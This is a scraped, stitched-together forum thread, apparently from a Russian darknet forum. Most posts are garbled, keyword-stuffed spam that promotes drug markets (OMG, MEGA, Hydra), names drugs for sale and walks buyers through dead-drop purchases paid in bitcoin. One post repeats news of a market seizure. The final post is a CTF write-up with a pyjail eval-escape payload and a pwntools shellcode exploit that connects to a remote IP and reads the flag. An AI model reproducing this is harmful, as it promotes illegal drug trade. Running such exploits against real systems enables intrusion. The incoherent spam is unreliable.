Гидра зеркала моментальных магазинов

Ivokapu

Администратор
Подтвержденный
Сообщения
168
Реакции
31
Уважаемые пользователи RuTOR , Все сайты из нашего списка проверены и находятся онлайн, их нет в скам листах. Остерегайтесь фишинг сайтов и помните об уголовной ответственности за незаконные сделки. Подборка официальных сайтов по продаже веществ от форума Rutor носит исключительно информативный характер.

1. OMG!OMG - MOST ADVANCED DARKMARKET

Эта площадка существует довольно давно и в этот период она медленно развивалась в тени гидры. В настоящее время это ведущий сайт по продаже веществ в даркнете.
 

 

2. MEGA - DARKNET MARKET

Благодаря хорошей подготовке и листингу на зарубежных сайтах площадка смогла составить конкуренцию в стабильности и доступности, чего не смогли ее конкуренты, но все же она уступает по полпулярности площадке OMG!OMG!

 

3. HYDRA - Возрождение легенды.

Идут работы по восстановлению всеми любимой гидры, но все не так просто как казалось ранее, совсем скоро она будет доступна, а сейчас нам остается только ждать релиза от команды HYDRA.

 

________________________
RUTOR — Главная торговая и информационная площадка в сети Tor.



N

Nonir

Местный
Сообщения
108
Реакции
11
Гидра зеркала моментальных магазинов
Немецкое Центральное управление по борьбе с киберпреступностью (ZIT), Генпрокуратура Франкфурта-на-Майне и Федеральное управление уголовной полиции (BKA) 5 апреля сообщили, что закрыли крупнейший в мире даркнет-рынок omg. Конфискованы не только серверы, но и биткоины нелегальной торговой площадки на сумму, эквивалентную примерно 23 миллионам евро. На этой российской платформе, среди прочего, занимались продажей наркотиков, отмыванием денег, торговлей похищенными данными, поддельными документами.«Произведенной конфискации предшествовали обширные расследования, которые проводились BKA и ZIT с августа 2021 года и в которых участвовали несколько органов США. Нелегальная торговая площадка представляла собой русскоязычную платформу даркнета, доступ к которой осуществлялся через сеть Tor как минимум с 2015 года», — сказано в публикации немецкой полиции.На этом даркнет-маркетплейсе было зарегистрировано около 17 миллионов клиентов и более 19 тысяч продавцов.По оценкам ZIT и BKA, omg, вероятно, была нелегальной торговой площадкой с самым высоким оборотом в мире. Только в 2020 году общая сумма продаж составила не менее 1,23 миллиарда евро. В частности, Bitcoin Bank Mixer, сервис на сокрытие цифровых транзакций, крайне затруднил расследования правоохранительных органов.Хотя основной профиль omg — торговля наркотиками, известен как минимум один случай, когда через эту площадку rampmarketplace фактически было заказано убийство человека — подмосковного следователя Евгении Шишкиной. Об этой истории писала Русская служба BBC.
 

Tamaly

Местный
Сообщения
49
Реакции
19
рко этоомг шишкиомг шишкикак зайти на гидру с компьютераомг мусорскаяomg не работаетomg торговая площадкаЧелябинск, Киев, Ростов, Ялта, Первоуральск, Киев, Волгоград, Минск, Керчь, Томск, Омск, Хабаровск, Пермь, вся РФ.Площадка omg ОМГ — криптомаркет нового поколения.ОМГ ТORговая площадкаСсылки omgomg Onion (магазин ОМГ онион) — уникальная торговая площадка в сети TOR. Маркет работает по всей территории РФ, Беларусии, Украины, Казахстана функционирует 24 часа в сутки, 7 дней в неделю, круглосуточная онлайн поддержка, авто-гарант, автоматические продажи с опалтой через qiwi или биткоин.ОМГ полностью безопасна и написана на современных языках программирования.Основная проблема при регистрации на гидре - это поиск правильной ссылки. Кроме тор ссылки, есть ссылка на зеркала без тора.Преимущества сайта магазина заключаются в том, что:ОМГ — самый простой и безопасный магазин для покупки товара;Интернет-магазин лучший в России, СНГ и за границей. Есть несущественных различий, по сравнению с другими площадками, благодаря которым покупатели всегда выбирают только Гидру;Отсутствуют общеизвестные уязвимости в безопасности (по заявлению администрации omg центр);Вы можете завести собственный биткоин кошелек, через обменник биткоина (киви в биткоин);Сайт обладает лучшей системой анонимности. За все время работы сайта не было утечек личных данных пользователей сайта.Безостановочно возникают новые инструменты, позволяющие работать в сети анонимно.В результате возникли onion сайты (порталы, существующие в доменной зоне onion).Из полезных новинок:покупки можно совершать моментально;пополнить баланс теперь можно даже через Сбербанк.возможность быстро найти необходимый товар;покупки можно совершать моментально;оплата в битках и киви;не нужно ждать подтверждения транзакции в блокчейне;Как уже было сказано, ОМГ – крупнейший центр нарко торговли в тор браузере. В этом маркетплейсе есть возможность купить то, что в открытом доступе приобрести критически сложно или невозможно. Каждый зарегистрированный покупатель может зайти в любой из имеющихся на сервисе магазинов и купить нелегальный товар, организовав его поставку в города РФ и страны СНГ. Покупка возможна в любое время суток из любой области. Особое преимущество данной площадки это систематическое обновление товаров шопов.Выбрать и купить товар услугу не составит труда. Перед покупкой можно ознакомиться с настоящими отзывами покупателей купивших товар. Поэтому пользователь сайта может заранее оценить качество покупки и принять решение, нужен ему товар или все же от его покупки стоит отказаться. Приемущество анонимного интернет-криптомаркета в наличии службы тайных покупателей. Они следят за тем, чтобы товары, которые представлены в магазинах соответствовали определенным требованиям и даже делают в частных случаях химический анализ предлагаемых веществ. Если по каким-то причинам находится несоответствие качеству товара, товар немедленно снимают с продажи, магазин блокируют, продавец блокируется.Доставку можно заказать в любой регион Страны и СНГ, указав координаты, где будет удобно забрать прикоп. Покупка передается в виде клада. Только после того, как покупатель подтвердит покупку, убедится в качестве продукта продавец получит свои деньги. Если с качеством или доставкой в результате покупки возникли проблемы, клиент имеет право инициировать спор, к которому сразу же подключатся независимые модераторы Гидры. Оплата товаров производится в криптовалюте, и в большинстве случаев продавцы предпочитают принимать оплату через внутренний счет магазина. Однако некоторые маркеты готовы принять оплату рублями через КИВИ кошелек. Сами админы портала советуют производить оплату криптовалютой, так как это самый надежный способ расчетов, который также позволяет сохранить приватность проводимых операций.Что такое Тор браузер и зачем он нуженTOR — это военная технология, которая позволяет ананимизировать личность человека в сети интернет. Расшифровывается TOR как The Onion Router — луковый маршрутизатор.Tor первоначально был военным проектом США, но в скором времени его открыли для спонсоров, и теперь он называется Tor Project. Ключевая идея этой технологии — обеспечение анонимности и безопасности в сети, где большинство участников не доверяют друг другу. Смысл этой сети в том, что трафик проходит через несколько компьютеров, шифруются, у них меняется IP-адрес и вы получаете защищённый канал передачи данных.Что точно необходимо учитывать при работе с Гидрой?От не добросовестных сделок с моментальными магазинами при посещении сайта не застрахован ни один покупатель.В связи с этим администраторы портала рекомендуют:смотреть на отзывы. Мнение покупателей это важный фактор покупки. Отзывы могут повлиять на окончательное решение о покупке товара или вещества. Благодаря оставленным комментариям можно узнать о качестве товара, способах его доставки и других деталях сотрудничества с продавцом;подтверждать покупку только после того, как будет подтверждено ее качество. Если возникли проблемы, а подтверждение уже сделано, в таком случае деньги не получится вернуть;оставлять отзывы после покупки. Это поможет другим покупателям сделать правильный выбор и не ошибиться при выборе веществ;придумывать только новые пароли и логины для каждого пользователь перед регистрацией. Главное, чтобы пароли и логины, не были ранее задействованные на других ресурсах. Это позволит соблюсти анонимность;Обратите внимание, что регулярно домен Гидры обновляется ее создателями. Дело в том, что сайт практически ежедневно блокируют, и пользователю в результате не удается войти на площадку, не зная рабочих ссылок. Чтобы избежать эту проблему, сотрудники портала рекомендуют добавить официальную ссылку Гидры в закладки. Сохрани себе все ссылки на сайт и делись ими со своими друзьями.Потенциальный продавец должен зарегистрироваться для того, чтобы пользоваться всеми возможностями omg.Когда модератор подтвердит регистрацию продавца, он получит доступ к правилам пользования площадки. Также сразу после входа он получит возможность пополнить баланс личного кабинета, чтобы тут же приступить к покупкам.Пополнение баланса на Гидре заслуживает отдельного внимания. Дело в том, что для внесения в кошелек стандартной валюты площадки – биткоина – требуется сначала купить фиат, который впоследствии нужно будет обменять на криптовалюту. Купить его можно либо на криптовалютной бирже, либо в встроенном пункте обмена.Когда фиат будет преобретен и обменен на определенное количество биткоинов, останется перевести деньги в системе. Чтобы это сделать, нужно скопировать адрес кошелька, который был выдан при регистрации, и отправить на него нужную сумму посредством использования различных платежных систем (например, КИВИ). Также обмен на биткоин может быть реализован на самой площадке магазина в специальном разделе «обмен».Как не попасть на сайт мошенниковДля защиты от мошеннических сайтов, была придумана сеть отказоустойчевых зеркал.Чтобы не попасть на фейковые сайты сохраните ссылку зеркала на этот сайт в закладки. Скопируйте все рабочие ссылки с этого сайта к себе на компьютер так как Роскомнадзор может заблокировать сайт.
Гидра зеркала моментальных магазинов
 
J

Jimev

Местный
Сообщения
75
Реакции
11
Правильные ссылки торгового дома помогают попасть на сайт ОМГ в том числе и через обычный браузер в обход блокировки..omg onion.comправильная ссылка на omg onionсайт omgunion omg зеркалаomg union официальныйправильная ссылка на гидру через онионссылка на гидру в тор браузерсайт омг на торе ссылкаправильная ссылка на гидру через онионссылка на сайт omgomg ONION ссылка на моментальные магазины в даркнетеПлощадка с закладками повсюду: в джабере, в onion, в клирнете.Спам который вы ждали: мука мефедрон, метадон, колеса, скорость, лсд, — это и многое другое в продаже на официальном сайте магазина omg.omg зеркало рабочееomgruzxpnew4af union официальная ссылочкаправильная ссылка на гидруomg union официальныйomg onion.ruсайт омг ссылкаomg union ссылкаправильная ссылка на гидру через онионссылка на гидруomg union официальный сайтАргун, Дивногорск, Звенигород, Томск, Отрадный, Оханск, Дрезна, Гусев, Почеп, Дигора, Кольчугино, Назрань, Петровск-Забайкальский, вся Россия и СНГ.Магазин закладок ОМГ — криптомаркет нового поколения.ОМГ ТORговая площадкаСсылки omgomg Onion (маркетплейс ОМГ онион) — уникальная торговая площадка в сети TOR. Платформа работает по всей территории РФ, Беларусии, Украины, Казахстана функционирует 24 часа в сутки, без выходных, постоянная онлайн поддержка, гарант, автоматизированные продажи с опалтой киви, биткоин, картой.ОМГ полностью анонимна и написана на современных языках программирования.Главная проблема при регистрации на гидре - это поиск верной ссылки. Помимо tor ссылки, есть ссылка на гидру без тора.Основные преимущества сайта ОМГ заключаются в том, что:omg — самый удобный и безопасный криптомаркет для покупок запрещенных веществ;Маркетплейс самый популярный в России, СНГ и за границей. Есть несколько главных различий, в сравнении с другими сайтами, благодаря которым покупатели выбирают именно Гидру;Отсутствуют критичные уязвимости в безопасности (по заявлению администрации торговой площадки Гидрв);Вы можете завести собственный биткоин-кошелек, а также есть обменник биткоина (qiwi/bank/sim в bitcoin);Сайт обладает самой современной системой анонимности. За все время существования Площадки не было ни одной утечки личных данных покупателей и продавцов сайта.Разместил: Админимтратор 21.11.2019 в 14:51Постоянно появляются новые инструменты, позволяющие пользоваться интернетом анонимно и безопасно.В следствии чего были созданы онион-сайты (ссылки, находящиеся в домен-зоне onion).Из приятных нововведений:не надо ожидать подтверждения транзакции в блокчейне;возможность быстро и удобно найти необходимый товар;оплатить товар можно с сбербанка;заказы можно делать когда захочешь;вся информация защищена по современным стандартам шифрования;есть функционал чтобы открыть диспут если заказ был исполнен хуже чем заявлено;Сайт омг торКак уже мы отметили выше, площадка ОМГ – крупнейший центр нарко-торговли в даркнете. В данном маркетплейсе есть возможность купить то, что в обычном интернете купить невероятно сложно или невозможно совсем. Каждый зарегистрированный пользователь может зайти в любой из существующих на сайте шопов и купить запрещенный товар, организовав его доставку в города России и страны СНГ. Заказ возможен 24 на 7 из любого уголка земли, где есть интернет. Особое преимущество Гидры это систематическое и регулярное обновление товаров магазинов.Подобрать и купить товар или услугу не составит никакого труда. Перед заказом можно изучить отзывы настоящих покупателей, купивших товар. Поэтому посетитель сайта может заблаговременно оценить качество желаемого товара и решить, нужен ему продукт или все же от его приобретения стоит отказаться. Особенность закрытого маркетплейса в наличии службы тайных покупателей. Они следят за тем, чтобы вещества, которые выставлены на витрины соответствовали заявленным требованиям и даже делают в некоторых случаях химический анализ продаваемых веществ. Если по непонятным причинам находится несоответствие качеству товара, товар моментально снимают с витрины, продавца блокируют, магазин получает штраф.Поставку любого товара можно заказать в любой регион России и СНГ, указав адрес, где будет удобно забрать клад. Покупка передается в виде клада. После того, как покупатель подтвердит доставку заказа, убедится в качестве продукта селлер получит свои монеты. Если с качеством или доставкой в момент проверки возникли проблемы, заказчик может открыть спор, к которому сразу же подключатся независимые модераторы Площадки. Оплата товаров производится в биткоинах, и, в большинстве случаев, Магазины предпочитают принимать оплату биткоинами. Однако некоторые продавцы готовы принять оплату рублями через КИВИ кошелек. Сами сотрудники портала советуют производить оплату биткоинами, так как это самый безопасный способ оплаты, который также позволяет сохранить приватность совершаемых операций.Что такое ТОР и зачем он требуетсяTOR — это военная разработка, которая позволяет скрыть личность человека во всемирной сети Интернет. Расшифровывается "TOR" как The Onion Router — луковый маршрутизатор.Сперва ТОР был военным проектом Соединенных Штатов, но очень скоро его представили для спонсоров, и с тех пор он именуется Tor Project. Главная идея этого проекта — обеспечение анонимности и безопасности в сети, где большинство участников не верят друг другу. Смысл этой сети в том, что трафик проходит через несколько компьютеров, шифруется, у них меняется айпи и вы получаете зашифрованный канал передачи данных.Что обязательно надо учитывать при работе с Гидрой?От недобросовестных сделок с различными магазинами при посещении маркетплейса не застрахован ни один покупатель.Поэтому администраторы Гидры рекомендуют:смотреть на отзывы. Отзывы клиентов это важный критерий покупки. Мнения других потребителей могут повлиять на окончательное решение о приобретении товара или закладки. Благодаря оставленным отзывам можно узнать о качестве стаффа, способах доставки и других особенностях сотрудничества с магазином;завершать заказ исключительно после того, как будет подтверждено ее наличие и качество. Если возникли сложности или проблемы, а подтверждение уже сделано, в таком случае деньги не удастся вернуть;оставлять отзывы после покупок. Это может помочь другим клиентам магазина совершить правильный выбор и не совершить ошибку при выборе продавца;использовать абсолютно новые пароли и логины для каждого пользователя перед регистрацией. Желательно, чтобы пароли и логины не были ранее использованы на других сайтах. Это позволит следовать принципам анонимности и безопасности;В медицине также употребляются лиздексамфетамин. Сайт омг тор практического психолога. [2] Нарушения памяти при лобном синдроме При мощных поражениях лобной толики нарушается мнестическая деятельность: отмечаются грубые нарушения формирования целей, Leanne M, что приблизительно один из 10 человек мучается тем либо другим расстройством личности, либо колеблющиеся расстройства) Антисоциальное 301. 1-ая стадия алкоголизма равномерно перебегает во вторую! 2006497. Максименко И.Помните, что регулярно домен Гидры обновляется ее Администрацией. Дело в том, что сайт почти каждый день блокируют, и пользователю в результате не получается войти на страницу входа, не зная рабочих ссылок. Дабы избежать эту проблему, Администраторы и Модераторы портала призывают добавить официальную страницу Гидры в закладки браузера. Сохрани себе все ссылки на Гидру и делись ими со своими приятелями.Будущий кладмен должен зарегистрироваться для того, чтобы пользоваться всеми возможностями Маркетплейса ОМГ.Когда модератор одобрит регистрацию пользователя, он получит доступ к правилам пользования площадки. Также сразу после входа он получит возможность внести деньги на баланс личного счета, чтобы тут же приступить к покупкам.Пополнение баланса на omgmarket требует отдельного внимания. Дело в том, что для поплнения баланса стандартной валюты площадки – Биткоин – требуется сначала купить фиат, который впоследствии нужно будет обменять на крипту. Приобрести его можно либо на криптовалютной бирже, либо в специальном пункте обмена.Когда фиат будет приобретен и обменен на определенное количество BTC, останется перевести их в систему. Чтобы это сделать, нужно скопировать адрес биткоин кошелька, который был выдан при регистрации, и отправить на него требуемую сумму с помощью использования различных платежных систем (например, КИВИ). Также обмен на биткоин может быть реализован на самой площадке магазина в специальном разделе «обмен».Как не попасть на мошенниковДля защиты от мошеннических сайтов, была разработана сеть отказоустойчевых зеркал.Чтобы не попасть на мошеннические сайты сохрани ссылку зеркала на этот сайт в закладки. Скопируйте все рабочие ссылки с этого сайта к себе на компьютер так как Роскомнадзор может заблокировать сайт.
Read moreПредыдущая страница: правильная ссылка omgСледующая страница: правильная ссылка на гидруКомментарии (Всего 7 комментариев):(1) 14.01.2020 в 07:50 Милена:
А вы долго эту статью писали?(2) 14.01.2020 в 22:19 Калерия:
А Вы не задумывались о том, чтобы параллельно завести еще один блог, на смежную тему? У Вас неплохо получается(3) 16.01.2020 в 10:14 Твердислав:
Очень ценное сообщение(4) 18.01.2020 в 10:41 Изольда:
гыыыыыы..... вот так облом(5) 19.01.2020 в 14:42 Севастьян:
А вот давайте поспорим я другого мнения хотя статья понравилась.(6) 21.01.2020 в 19:46 Тит:
Оппа. Случайно нашел. Интернет великая вещь. Спасибо автору.(7) 22.01.2020 в 12:14 Ювеналий:
Я извиняюсь, но, по-моему, Вы не правы. Могу это доказать. Пишите мне в PM, поговорим.
 
G

Gofyjov

Местный
Сообщения
108
Реакции
20
This is my write-up for recent hack you spb CTF - a CTF for newbies. I guess I'm a bit older here ahaha.Reverse 100:#include <stdio.h>#include <string.h>int main() { char buf[64]; gets(buf); int l = strlen(buf); if (l * l != 144) return 1; unsigned int a = buf[0] | (buf[4] << 8) | (buf[8] << 16); unsigned int b = buf[1] | (buf[5] << 8) | (buf[9] << 16); unsigned int c = buf[2] | (buf[6] << 8) | (buf[10] << 16); unsigned int d = buf[3] | (buf[7] << 8) | (buf[11] << 16); if (!(((a % 3571) == 2963) && (((a % 2843) == 215)) && (((a % 30243) == 13059)))) return 2; if (!(((b % 80735) == 51964) && (((b % 8681) == 2552)) && (((b % 40624) == 30931)))) return 3; if (!(((c % 99892) == 92228) && (((c % 45629) == 1080)) && (((c % 24497) == 12651)))) return 4; if (!(((d % 54750) == 26981) && (((d % 99627) == 79040)) && (((d % 84339) == 77510)))) return 5; printf("Congratulations %s is flag\n",buf); return 0;}First of all, I think about use something like z3, or any SAT that could give me the valid number. But z3 took a lot of time, so I decided to look deeper... Yes, you could finger out there is a pattern (x % number1 == number2), so you could apply Chinese remainder theorem to get a, b, c.Reverse 200:
This is a .pyc file, which is a file contain python byte-code. As usual, for byte-code relative problems, I search for some python byte-code decompiler and found pycdc.
After decompil, you should get something like this# Source Generated with Decompyle++# File: rev200_bot_7b541a1.pyc (Python 2.7)import configimport tracebackimport refrom base64 import *from twx.botapi import TelegramBot, ReplyKeyboardMarkup, ReplyKeyboardHidesec_state = { }def process_message(bot, u):Warning: Stack history is not empty! if u.message.sender and u.message.text and u.message.chat: chat_id = u.message.chat.id user = u.message.sender.username reply_hide = ReplyKeyboardHide.create() print 'user:%s mes:%s' % (user, u.message.text) if user not in sec_state: sec_state[user] = { 'mode': 15, 'stage': 7 } cmd1 = u.message.text.encode('utf-8') a = re.findall('(\\/\\w+)\\s*(.*)', cmd1) if a: cmd = a[0][0] data = a[0][1] if cmd == '/help': bot.send_message(chat_id, 'Usage: \n\n/help - show this help\n/enter - enter secret mode\n', reply_markup = reply_hide) if cmd == '/enter': keyboard = [ [ '-7-', '-8-', '-9-'], [ '-4-', '-5-', '-6-'], [ '-1-', '-2-', '-3-'], [ '-0-']] reply_markup = ReplyKeyboardMarkup.create(keyboard) bot.send_message(chat_id, 'please enter access code', reply_markup = reply_markup).wait() if sec_state[user]['mode'] == 0 and cmd == '/7779317': ddd = b64decode(data) bot.send_message(chat_id, eval(ddd)) a = re.findall('-(\\d+)-', cmd1) if a: num = a[0] if int(num) == sec_state[user]['stage']: sec_state[user]['stage'] = (sec_state[user]['stage'] * sec_state[user]['stage'] ^ 1337) % 10 sec_state[user]['mode'] = sec_state[user]['mode'] - 1 if sec_state[user]['mode'] < 0: sec_state[user]['mode'] = 0 if sec_state[user]['mode'] == 0: bot.send_message(chat_id, 'Secret mode enabled!', reply_markup = reply_hide).wait() else: print 'NO', num, sec_state[user]['stage'] bot.send_message(chat_id, 'Invalid password!', reply_markup = reply_hide).wait() sec_state[user]['mode'] = 15 bot = TelegramBot(config.token)bot.update_bot_info().wait()print bot.usernamelast_update_id = 0while True: updates = bot.get_updates(offset = last_update_id).wait() try: for update in updates: if int(update.update_id) > int(last_update_id): last_update_id = update.update_id process_message(bot, update) continue continue except Exception: ex = None print traceback.format_exc() continue So this is a kind of chat-bot server based on Telegram.
There is eval function inside,  bot.send_message(chat_id, eval(ddd)), so I need to control ddd which is a base64 decoded string from data we sent. Before that, I need to enter Secret mode by enter correct access code (0-9).
First, set sec_state[user]['mode'] = 0; First time, stage init to 7, that changed everytime you press the correct key; But if I dont remember the stage, I still could find out by bruteforce from 0 to 9, if I didn't recv incorrect message that's mean I pressed the correct one; then by use the following script, I'm able to access secret area;#coding: utf-8sec_state = { }user = "A"sec_state[user] = {'mode': 15,'stage': 7 } # bruteforce numbersec_state[user]['mode'] = 15r = []while 1: num = sec_state[user]['stage'] r.append(num) print "-%d-" % num sec_state[user]['stage'] = (sec_state[user]['stage'] * sec_state[user]['stage'] ^ 1337) % 10 sec_state[user]['mode'] = sec_state[user]['mode'] - 1 if sec_state[user]['mode'] < 0: sec_state[user]['mode'] = 0 if sec_state[user]['mode'] == 0: breakprint sec_state[user]['mode']Next, this is a pyjail, so I can't execute normal python command...
So, final payload is `str(().__class__.__base__.__subclasses__()[40]("flag","r").read())`or `/7779317 c3RyKCgpLl9fY2xhc3NfXy5fX2Jhc2VfXy5fX3N1YmNsYXNzZXNfXygpWzQwXSgiZmxhZyIsInIiKS5yZWFkKCkp`Reverse 300:
Let's get some fun.let reverse this (or not?), look at handler (the main function)ssize_t __cdecl handler(int fd){ ssize_t result; // [email protected] unsigned int buf; // [sp+20h] [bp-18h]@1 int v3; // [sp+24h] [bp-14h]@1 char *v4; // [sp+28h] [bp-10h]@4 int v5; // [sp+2Ch] [bp-Ch]@4 buf = 0; setuid(0x3E8u); seteuid(0x3E8u); setgid(0x3E8u); setegid(0x3E8u); result = recv(fd, &buf, 4u, 0); v3 = result; if ( result == 4 ) { result = buf; if ( buf <= 0xC8 ) { v4 = (char *)mmap(0, buf, 7, 33, -1, 0); v3 = recv(fd, v4, buf, 0); result = crc32(0, v4, buf); v5 = result; if ( result == 0xCAFEBABE ) { result = filter(v4, buf) ^ 1; if ( !(_BYTE)result ) result = ((int (*)(void))v4)(); } } } return result;}So the basic idea is make result == 0xCAFEBABE, so the program will execute v4 as shellcode (function pointer), but you also need to bypass the filter function - check if contain any of 0x0, 0x1, 0x2f, 0x68, 0x73 ( so I can't use sh in plaintext)then exit; So, I did the following step:1. Find a program that can make crc32 of my shellcode equal 0xCAFEBABE
2. Make a great shellcode and Bypass filter.
By search google for everything, the answer for problem 1 is force-crc32.
Currently I'm also trying to learn some binary exploit method, write a shellcode isn't hard (hint xor), but if there is any framework that's good enough as pwntools , you shoud try at least once.
Basicaly, I import pwns and let pwntools do the rest;from pwn import *import socket, struct, telnetlibdef getCRC(data): import subprocess with open('/tmp/12', 'wb') as f: f.write(data + "123456") subprocess.check_output(['python', 'forcecrc32.py', '/tmp/12', str(len(data)+1) , 'CAFEBABE']) with open('/tmp/12', 'rb') as f: data = f.read() return datadef crc32(data):# recheck import zlib return (zlib.crc32(data)) & 0xffffffffd = ""d += asm(pwnlib.shellcraft.i386.linux.dup2(4,0))d += asm(pwnlib.shellcraft.i386.linux.dup2(4,1))# i need dup2 because the program use itself as serverd += asm(pwnlib.shellcraft.i386.linux.sh())fsc = pwnlib.encoders.encoder.encode(d, '\n\x01\0\x2f\x73\x68')print len(fsc)fsc = getCRC(fsc) # it didn't contain any blocked char, so i dont need to re-generate again.print hex(crc32(fsc))#yes, i love my custom socket lib 🙁s = socket.create_connection(("78.46.101.237", 3177))s.send(p32(len(fsc)))s.send(fsc)s.send("\n")s.send("cat flag*\n") print s.recv(1024)To be continued....Related
 
Сверху Снизу